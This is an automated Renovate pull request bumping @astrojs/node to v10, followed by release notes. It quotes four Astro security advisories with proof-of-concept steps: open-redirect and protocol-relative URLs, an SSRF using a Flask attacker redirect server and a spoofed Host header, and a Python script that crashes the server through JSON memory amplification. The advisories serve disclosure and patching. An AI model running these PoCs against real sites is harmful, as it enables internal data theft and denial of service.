fix(deps): update dependency @astrojs/node to v10 [security]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
@astrojs/node (source)	8.3.4 → 10.0.0

GitHub Vulnerability Alerts

CVE-2025-55207

Summary

Following GHSA-cq8c-xv66-36gw, there's still an Open Redirect vulnerability in a subset of Astro deployment scenarios.

Details

Astro 5.12.8 fixed a case where https://example.com//astro.build/press would redirect to the external origin //astro.build/press. However, with the Node deployment adapter in standalone mode and trailingSlash set to "always" in the Astro configuration, https://example.com//astro.build/press still redirects to //astro.build/press.

Proof of Concept

1. Create a new minimal Astro project (astro@5.12.8)
2. Configure it to use the Node adapter (@astrojs/node@9.4.0) and force trailing slashes:

   // astro.config.mjs
   import { defineConfig } from 'astro/config';
   import node from '@​astrojs/node';
   
   export default defineConfig({
     trailingSlash: 'always',
     adapter: node({ mode: 'standalone' }),
   });

3. Build the site by running astro build.
4. Run the server, e.g. with astro preview.
5. Append //astro.build/press to the preview URL, e.g. http://localhost:4321//astro.build/press
6. The site will redirect to the external Astro Build origin.

Example reproduction

1. Open this StackBlitz reproduction.
2. Open the preview in a separate window so the StackBlitz embed doesn't cause security errors.
3. Append //astro.build/press to the preview URL, e.g. https://x.local-corp.webcontainer.io//astro.build/press.
4. See it redirect to the external Astro Build origin.

Impact

This is classified as an Open Redirection vulnerability (CWE-601). It affects any user who clicks on a specially crafted link pointing to the affected domain. Since the domain appears legitimate, victims may be tricked into trusting the redirected page, leading to possible credential theft, malware distribution, or other phishing-related attacks.

No authentication is required to exploit this vulnerability. Any unauthenticated user can trigger the redirect by clicking a malicious link.

CVE-2025-55303

Summary

In affected versions of astro, the image optimization endpoint in projects deployed with on-demand rendering allows images from unauthorized third-party domains to be served.

Details

On-demand rendered sites built with Astro include an /_image endpoint which returns optimized versions of images.

The /_image endpoint is restricted to processing local images bundled with the site and also supports remote images from domains the site developer has manually authorized (using the image.domains or image.remotePatterns options).

However, a bug in impacted versions of astro allows an attacker to bypass the third-party domain restrictions by using a protocol-relative URL as the image source, e.g. /_image?href=//example.com/image.png.

Proof of Concept

1. Create a new minimal Astro project (astro@5.13.0).

2. Configure it to use the Node adapter (@astrojs/node@9.1.0 — newer versions are not impacted):

   // astro.config.mjs
   import { defineConfig } from 'astro/config';
   import node from '@​astrojs/node';
   
   export default defineConfig({
   	adapter: node({ mode: 'standalone' }),
   });

3. Build the site by running astro build.

4. Run the server, e.g. with astro preview.

5. Append /_image?href=//placehold.co/600x400 to the preview URL, e.g. http://localhost:4321/_image?href=//placehold.co/600x400

6. The site will serve the image from the unauthorized placehold.co origin.

Impact

Allows a non-authorized third-party to create URLs on an impacted site’s origin that serve unauthorized image content.
In the case of SVG images, this could include the risk of cross-site scripting (XSS) if a user followed a link to a maliciously crafted SVG.

CVE-2026-25545

Summary

Server-Side Rendered pages that return an error with a prerendered custom error page (eg. 404.astro or 500.astro) are vulnerable to SSRF. If the Host: header is changed to an attacker's server, it will be fetched on /500.html and they can redirect this to any internal URL to read the response body through the first request.

Details

The following line of code fetches statusURL and returns the response back to the client:

https://github.com/withastro/astro/blob/bf0b4bfc7439ddc565f61a62037880e4e701eb05/packages/astro/src/core/app/base.ts#L534

statusURL comes from this.baseWithoutTrailingSlash, which is built from the Host: header. prerenderedErrorPageFetch() is just fetch(), and follows redirects. This makes it possible for an attacker to set the Host: header to their server (eg. Host: attacker.tld), and if the server still receives the request without normalization, Astro will now fetch http://attacker.tld/500.html.

The attacker can then redirect this request to http://localhost:8000/ssrf.txt, for example, to fetch any locally listening service. The response code is not checked, because as the comment in the code explains, this fetch may give a 200 OK. The body and headers are returned back to the attacker.

Looking at the vulnerable code, the way to reach this is if the renderError() function is called (error response during SSR) and the error page is prerendered (custom 500.astro error page). The PoC below shows how a basic project with these requirements can be set up.

Note: Another common vulnerable pattern for 404.astro we saw is:

return new Response(null, {status: 404});

Also, it does not matter what allowedDomains is set to, since it only checks the X-Forwarded-Host: header.

https://github.com/withastro/astro/blob/9e16d63cdd2537c406e50d005b389ac115755e8e/packages/astro/src/core/app/base.ts#L146

PoC

1. Create a new empty project

npm create astro@latest poc -- --template minimal --install --no-git --yes

2. Create poc/src/pages/error.astro which throws an error with SSR:

---
export const prerender = false;

throw new Error("Test")
---

3. Create poc/src/pages/500.astro with any content like:

<p>500 Internal Server Error</p>

4. Build and run the app

cd poc
npx astro add node --yes
npm run build && npm run preview

5. Set up an "internal server" which we will SSRF to. Create a file called ssrf.txt and host it locally on http://localhost:8000:

cd $(mktemp -d)
echo "SECRET CONTENT" > ssrf.txt
python3 -m http.server

6. Set up attacker's server with exploit code and run it, so that its server becomes available on http://localhost:5000:

# pip install Flask
from flask import Flask, redirect

app = Flask(__name__)

@​app.route("/500.html")
def exploit():
    return redirect("http://127.0.0.1:8000/ssrf.txt")

if __name__ == "__main__":
    app.run()

7. Send the following request to the server, and notice the 500 error returns "SECRET CONTENT".

$ curl -i http://localhost:4321/error -H 'Host: localhost:5000'
HTTP/1.1 500 OK
content-type: text/plain
date: Tue, 03 Feb 2026 09:51:28 GMT
last-modified: Tue, 03 Feb 2026 09:51:09 GMT
server: SimpleHTTP/0.6 Python/3.12.3
Connection: keep-alive
Keep-Alive: timeout=5
Transfer-Encoding: chunked

SECRET CONTENT

Impact

An attacker who can access the application without Host: header validation (eg. through finding the origin IP behind a proxy, or just by default) can fetch their own server to redirect to any internal IP. With this they can fetch cloud metadata IPs and interact with services in the internal network or localhost.

For this to be vulnerable, a common feature needs to be used, with direct access to the server (no proxies).

CVE-2026-29772

Summary

Astro's Server Islands POST handler buffers and parses the full request body as JSON without enforcing a size limit. Because JSON.parse() allocates a V8 heap object for every element in the input, a crafted payload of many small JSON objects achieves ~15x memory amplification (wire bytes to heap bytes), allowing a single unauthenticated request to exhaust the process heap and crash the server. The /_server-islands/[name] route is registered on all Astro SSR apps regardless of whether any component uses server:defer, and the body is parsed before the island name is validated, so any Astro SSR app with the Node standalone adapter is affected.

Details

Astro automatically registers a Server Islands route at /_server-islands/[name] on all SSR apps, regardless of whether any component uses server:defer. The POST handler in packages/astro/src/core/server-islands/endpoint.ts buffers the entire request body into memory and parses it as JSON with no size or depth limit:

// packages/astro/src/core/server-islands/endpoint.ts (lines 55-56)
const raw = await request.text();    // full body buffered into memory — no size limit
const data = JSON.parse(raw);        // parsed into V8 object graph — no element count limit

The request body is parsed before the island name is validated, so the attacker does not need to know any valid island name — /_server-islands/anything triggers the vulnerable code path. No authentication is required.

Additionally, JSON.parse() allocates a heap object for every array/object in the input, so a payload consisting of many empty JSON objects (e.g., [{},{},{},...]) achieves ~15x memory amplification (wire bytes to heap bytes). The entire object graph is held as a single live reference until parsing completes, preventing garbage collection. An 8.6 MB request is sufficient to crash a server with a 128 MB heap limit.

PoC

Environment: Astro 5.18.0, @astrojs/node 9.5.4, Node.js 22 with --max-old-space-size=128.

The app does not use server:defer — this is a minimal SSR setup with no server island components. The route is still registered and exploitable.

Setup files:

package.json:

{
  "name": "poc-server-islands-dos",
  "scripts": {
    "build": "astro build",
    "start": "node --max-old-space-size=128 dist/server/entry.mjs"
  },
  "dependencies": {
    "astro": "5.18.0",
    "@​astrojs/node": "9.5.4"
  }
}

astro.config.mjs:

import { defineConfig } from 'astro/config';
import node from '@​astrojs/node';

export default defineConfig({
  output: 'server',
  adapter: node({ mode: 'standalone' }),
});

src/pages/index.astro:

---
---
<html>
<head><title>Astro App</title></head>
<body>
  <h1>Hello</h1>
  <p>Just a plain SSR page. No server islands.</p>
</body>
</html>

Dockerfile:

FROM node:22-slim
WORKDIR /app
COPY package.json .
RUN npm install
COPY . .
RUN npm run build
EXPOSE 4321
CMD ["node", "--max-old-space-size=128", "dist/server/entry.mjs"]

docker-compose.yml:

services:
  astro:
    build: .
    ports:
      - "4321:4321"
    deploy:
      resources:
        limits:
          memory: 256m

Reproduction:

# Build and start
docker compose up -d

# Verify server is running
curl http://localhost:4321/

# => 200 OK

crash.py:

import requests

# Any path under /_server-islands/ works — no valid island name needed
TARGET = "http://localhost:4321/_server-islands/x"

# 3M empty objects: each {} is ~3 bytes JSON but ~56-80 bytes as V8 object

# 8.6 MB on wire → ~180+ MB heap allocation → exceeds 128 MB limit
n = 3_000_000
payload = '[' + ','.join(['{}'] * n) + ']'
print(f"Payload: {len(payload) / (1024*1024):.1f} MB")

try:
    r = requests.post(TARGET, data=payload,
        headers={"Content-Type": "application/json"}, timeout=30)
    print(f"Status: {r.status_code}")
except requests.exceptions.ConnectionError:
    print("Server crashed (OOM killed)")

$ python crash.py
Payload: 8.6 MB
Server crashed (OOM killed)

$ curl http://localhost:4321/
curl: (7) Failed to connect to localhost port 4321: Connection refused

$ docker compose ps
NAME      IMAGE     COMMAND   SERVICE   CREATED   STATUS    PORTS
(empty — container was OOM killed)

The server process is killed and does not recover. Repeated requests in a containerized environment with restart policies cause a persistent crash-restart loop.

Impact

Any Astro SSR app with the Node standalone adapter is affected — the /_server-islands/[name] route is registered by default regardless of whether any component uses server:defer. Unauthenticated attackers can crash the server process with a single crafted HTTP request under 9 MB. In containerized environments with memory limits, repeated requests cause a persistent crash-restart loop, denying service to all users. The attack requires no authentication and no knowledge of valid island names — any value in the [name] parameter works because the body is parsed before the name is validated.

---

Release Notes

withastro/astro (@​astrojs/node)

v10.0.0

Compare Source

Major Changes

• #​15654 a32aee6 Thanks @​florian-lefebvre! - Removes the experimentalErrorPageHost option

  This option allowed fetching a prerendered error page from a different host than the server is currently running on.

  However, there can be security implications with prefetching from other hosts, and often more customization was required to do this safely. This has now been removed as a built-in option so that you can implement your own secure solution as needed and appropriate for your project via middleware.

What should I do?

If you were previously using this feature, you must remove the option from your adapter configuration as it no longer exists:

// astro.config.mjs
import { defineConfig } from 'astro/config'
import node from '@​astrojs/node'

export default defineConfig({
  adapter: node({
    mode: 'standalone',
-    experimentalErrorPageHost: 'http://localhost:4321'
  })
})

You can replicate the previous behavior by checking the response status in a middleware and fetching the prerendered page yourself:

// src/middleware.ts
import { defineMiddleware } from 'astro:middleware';

export const onRequest = defineMiddleware(async (ctx, next) => {
  const response = await next();
  if (response.status === 404 || response.status === 500) {
    return fetch(`http://localhost:4321/${response.status}.html`);
  }
  return response;
});

Minor Changes

• #​15258 d339a18 Thanks @​ematipico! - Stabilizes the adapter feature experimentalStatiHeaders. If you were using this feature in any of the supported adapters, you'll need to change the name of the flag:

  export default defineConfig({
    adapter: netlify({
  -    experimentalStaticHeaders: true
  +    staticHeaders: true
    })
  })

• #​15759 39ff2a5 Thanks @​matthewp! - Adds a new bodySizeLimit option to the @astrojs/node adapter

  You can now configure a maximum allowed request body size for your Node.js standalone server. The default limit is 1 GB. Set the value in bytes, or pass 0 to disable the limit entirely:

  import node from '@​astrojs/node';
  import { defineConfig } from 'astro/config';
  
  export default defineConfig({
    adapter: node({
      mode: 'standalone',
      bodySizeLimit: 1024 * 1024 * 100, // 100 MB
    }),
  });

• #​15006 f361730 Thanks @​florian-lefebvre! - Adds new session driver object shape

  For greater flexibility and improved consistency with other Astro code, session drivers are now specified as an object:

  -import { defineConfig } from 'astro/config'
  +import { defineConfig, sessionDrivers } from 'astro/config'
  
  export default defineConfig({
    session: {
  -    driver: 'redis',
  -    options: {
  -      url: process.env.REDIS_URL
  -    },
  +    driver: sessionDrivers.redis({
  +      url: process.env.REDIS_URL
  +    }),
    }
  })

  Specifying the session driver as a string has been deprecated, but will continue to work until this feature is removed completely in a future major version. The object shape is the current recommended and documented way to configure a session driver.

• #​14946 95c40f7 Thanks @​ematipico! - Removes the experimental.csp flag and replaces it with a new configuration option security.csp - (v6 upgrade guidance)

Patch Changes

• #​15473 d653b86 Thanks @​matthewp! - Improves error page loading to read from disk first before falling back to configured host

• #​15562 e14a51d Thanks @​florian-lefebvre! - Updates to new Adapter API introduced in v6

• #​15585 98ea30c Thanks @​matthewp! - Add a default body size limit for server actions to prevent oversized requests from exhausting memory.

• #​15777 02e24d9 Thanks @​matthewp! - Fixes CSRF origin check mismatch by passing the actual server listening port to createRequest, ensuring the constructed URL origin includes the correct port (e.g., http://localhost:4321 instead of http://localhost). Also restricts X-Forwarded-Proto to only be trusted when allowedDomains is configured.

• #​15714 9a2c949 Thanks @​ematipico! - Fixes an issue where static headers weren't correctly applied when the website uses base.

• #​15763 1567e8c Thanks @​matthewp! - Normalizes static file paths before evaluating dotfile access rules for improved consistency

• #​15164 54dc11d Thanks @​HiDeoo! - Fixes an issue where the Node.js adapter could fail to serve a 404 page matching a pre-rendered dynamic route pattern.

• #​15745 20b05c0 Thanks @​matthewp! - Hardens static file handler path resolution to ensure resolved paths stay within the client directory

• #​15495 5b99e90 Thanks @​leekeh! - Refactors to use middlewareMode adapter feature (set to classic)

• #​15657 cb625b6 Thanks @​qzio! - Adds a new security.actionBodySizeLimit option to configure the maximum size of Astro Actions request bodies.

  This lets you increase the default 1 MB limit when your actions need to accept larger payloads. For example, actions that handle file uploads or large JSON payloads can now opt in to a higher limit.

  If you do not set this option, Astro continues to enforce the 1 MB default to help prevent abuse.

  // astro.config.mjs
  export default defineConfig({
    security: {
      actionBodySizeLimit: 10 * 1024 * 1024, // set to 10 MB
    },
  });

• Updated dependencies [4ebc1e3, 4e7f3e8, a164c77, cf6ea6b, a18d727, 240c317, 745e632]:

  • @​astrojs/internal-helpers@​0.8.0

v9.5.5

Compare Source

Patch Changes

• Updated dependencies [c2cd371]:
  • @​astrojs/internal-helpers@​0.7.6

v9.5.4

Compare Source

Patch Changes

• #​15564 522f880 Thanks @​matthewp! - Add a default body size limit for server actions to prevent oversized requests from exhausting memory.

• #​15572 ef851bf Thanks @​matthewp! - Upgrade astro package support

  astro@​5.17.3 includes a fix to prevent Action payloads from exhausting memory. @​astrojs/node now depends on this version of Astro as a minimum requirement.

v9.5.3

Compare Source

Patch Changes

• c13b536 Thanks @​matthewp! - Improves error page loading to read from disk first before falling back to configured host

v9.5.2

Compare Source

Patch Changes

• #​15196 a8317c1 Thanks @​ematipico! - Fixes an issue where some prendered pages weren't correctly rendered when using the Node.js adapter in middleware mode.

• #​15169 b803d8b Thanks @​rururux! - fix: fix image 500 error when moving dist directory in standalone Node

v9.5.1

Compare Source

Patch Changes

• Updated dependencies [9e9c528, 0f75f6b]:
  • @​astrojs/internal-helpers@​0.7.5

v9.5.0

Compare Source

Minor Changes

• #​14441 62ec8ea Thanks @​upsuper! - Updates redirect handling to be consistent across static and server output, aligning with the behavior of other adapters.

  Previously, the Node.js adapter used default HTML files with meta refresh tags when in static output. This often resulted in an extra flash of the page on redirect, while also not applying the proper status code for redirections. It's also likely less friendly to search engines.

  This update ensures that configured redirects are always handled as HTTP redirects regardless of output mode, and the default HTML files for the redirects are no longer generated in static output. It makes the Node.js adapter more consistent with the other official adapters.

  No change to your project is required to take advantage of this new adapter functionality. It is not expected to cause any breaking changes. However, if you relied on the previous redirecting behavior, you may need to handle your redirects differently now. Otherwise, you should notice smoother redirects, with more accurate HTTP status codes, and may potentially see some SEO gains.

v9.4.6

Compare Source

Patch Changes

• #​14514 66a26d7 Thanks @​matthewp! - Fixes compatibility issue with older versions of Astro by making getAllowedDomains() call optional and updating peer dependency to require astro@^5.14.3

v9.4.5

Compare Source

Patch Changes

• Updated dependencies [b8ca69b]:
  • @​astrojs/internal-helpers@​0.7.4

v9.4.4

Compare Source

Patch Changes

• Updated dependencies [1e2499e]:
  • @​astrojs/internal-helpers@​0.7.3

v9.4.3

Compare Source

Patch Changes

• #​14240 77b18fb Thanks @​delucis! - Increases the minimum supported version of Astro to 5.7.0

v9.4.2

Compare Source

Patch Changes

• Updated dependencies [4d16de7]:
  • @​astrojs/internal-helpers@​0.7.2

v9.4.1

Compare Source

Patch Changes

• 5fc3c59 Thanks @​ematipico! - Fixes a routing bug in standalone mode with trailingSlash set to "always".

v9.4.0

Compare Source

Minor Changes

• #​14188 e3422aa Thanks @​ascorbic! - Adds support for specifying a host to load prerendered error pages

  By default, if a user defines a custom error page that is prerendered, Astro will load it from the same host as the one that the request is made to. This change allows users to specify a different host for loading prerendered error pages. This can be useful in scenarios such as where the server is running behind a reverse proxy or when prerendered pages are hosted on a different domain.

  To use this feature, set the experimentalErrorPageHost adapter option in your Astro configuration to the desired host URL. For example, if your server is running on localhost and served via a proxy, you can ensure the prerendered error pages are fetched via the localhost URL:

  import { defineConfig } from 'astro/config';
  import node from '@​astrojs/node';
  export default defineConfig({
    adapter: node({
      // If your server is running on localhost and served via a proxy, set the host like this to ensure prerendered error pages are fetched via the localhost URL
      experimentalErrorPageHost: 'http://localhost:4321',
    }),
  });

  For more information on enabling and using this experimental feature, see the @astrojs/node adapter docs.

v9.3.3

Compare Source

Patch Changes

• Updated dependencies [0567fb7]:
  • @​astrojs/internal-helpers@​0.7.1

v9.3.2

Compare Source

Patch Changes

• Updated dependencies [f4e8889]:
  • @​astrojs/internal-helpers@​0.7.0

v9.3.1

Compare Source

Patch Changes

• #​14148 e4d74ba Thanks @​ColoredCarrot! - fix(node): emit set-cookie header from middlewares for not-found routes (#​14136)

v9.3.0

Compare Source

Minor Changes

• #​14012 a125a14 Thanks @​florian-lefebvre! - Adds a new experimental configuration option experimentalDisableStreaming to allow you to opt out of Astro's default HTML streaming for pages rendered on demand.

  HTML streaming helps with performance and generally provides a better visitor experience. In most cases, disabling streaming is not recommended.

  However, when you need to disable HTML streaming (e.g. your host only supports non-streamed HTML caching at the CDN level), you can now opt out of the default behavior:

  import { defineConfig } from 'astro/config';
  import node from '@​astrojs/node';
  
  export default defineConfig({
    adapter: node({
      mode: 'standalone',
  +    experimentalDisableStreaming: true,
    }),
  });

• #​13972 db8f8be Thanks @​ematipico! - Adds support for the experimental static headers Astro feature.

  When the feature is enabled via the option experimentalStaticHeaders, and experimental Content Security Policy is enabled, the adapter will generate Response headers for static pages, which allows support for CSP directives that are not supported inside a <meta> tag (e.g. frame-ancestors).

  import { defineConfig } from 'astro/config';
  import node from '@​astrojs/node';
  
  export default defineConfig({
    adapter: node({
      mode: 'standalone',
      experimentalStaticHeaders: true,
    }),
    experimental: {
      cps: true,
    },
  });

v9.2.2

Compare Source

Patch Changes

• #​13507 660e83f Thanks @​TheOtterlord! - Handle errors where a module is not found when loading the server entrypoint

v9.2.1

Compare Source

Patch Changes

• #​13591 5dd2d3f Thanks @​florian-lefebvre! - Removes unused code

v9.2.0

Compare Source

Minor Changes

• #​13527 2fd6a6b Thanks @​ascorbic! - The experimental session API introduced in Astro 5.1 is now stable and ready for production use.

  Sessions are used to store user state between requests for on-demand rendered pages. You can use them to store user data, such as authentication tokens, shopping cart contents, or any other data that needs to persist across requests:

v9.1.3

Compare Source

Patch Changes

• Updated dependencies [042d1de]:
  • @​astrojs/internal-helpers@​0.6.1

v9.1.2

Compare Source

Patch Changes

• Updated dependencies [1e11f5e]:
  • @​astrojs/internal-helpers@​0.6.0

v9.1.1

Compare Source

Patch Changes

• #​13190 c6bf6b3 Thanks @​lee-arnold! - Fixes the image endpoint entrypoint

v9.1.0

Compare Source

Minor Changes

• #​13145 8d4e566 Thanks @​ascorbic! - Automatically configures filesystem storage when experimental session enabled

  If the experimental.session flag is enabled when using the Node adapter, Astro will automatically configure session storage using the filesystem driver. You can still manually configure session storage if you need to use a different driver or want to customize the session storage configuration.

  See the experimental session docs for more information on configuring session storage.

v9.0.3

Patch Changes

• #​13223 23094a1 Thanks @​ascorbic! - Fixes a bug that caused incorrect redirects for static files with numbers in the file extension

v9.0.2

Patch Changes

• #​514 ea4297b Thanks @​ascorbic! - Fixes a bug that caused the preview server to ignore wildcard host options

v9.0.1

Patch Changes

• #​454 83cedad Thanks @​alexanderniebuhr! - Improves Astro 5 support

v9.0.0

Major Changes

• #​375 e7881f7 Thanks @​Princesseuh! - Updates internal code to works with Astro 5 changes to hybrid rendering. No changes are necessary to your project, apart from using Astro 5

• #​397 776a266 Thanks @​Princesseuh! - Welcome to the Astro 5 beta! This release has no changes from the latest alpha of this package, but it does bring us one step closer to the final, stable release.

  Starting from this release, no breaking changes will be introduced unless absolutely necessary.

  To learn how to upgrade, check out the Astro v5.0 upgrade guide in our beta docs site.

• #​392 3a49eb7 Thanks @​Princesseuh! - Updates internal code for Astro 5 changes. No changes is required to your project, apart from using Astro 5

• #​451 167b369 Thanks @​ematipico! - Updates send dependency to v1.1.0

Minor Changes

• #​385 bb725b7 Thanks @​florian-lefebvre! - Cleans up astro:env support

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[renovate]

Renovate Ignore Notification

Because you closed this PR without merging, Renovate will ignore this update. You will not get PRs for any future 10.x releases. But if you manually upgrade to 10.x then Renovate will re-enable minor and patch updates automatically.

If you accidentally closed this PR, or if you changed your mind: rename this PR to get a fresh replacement PR.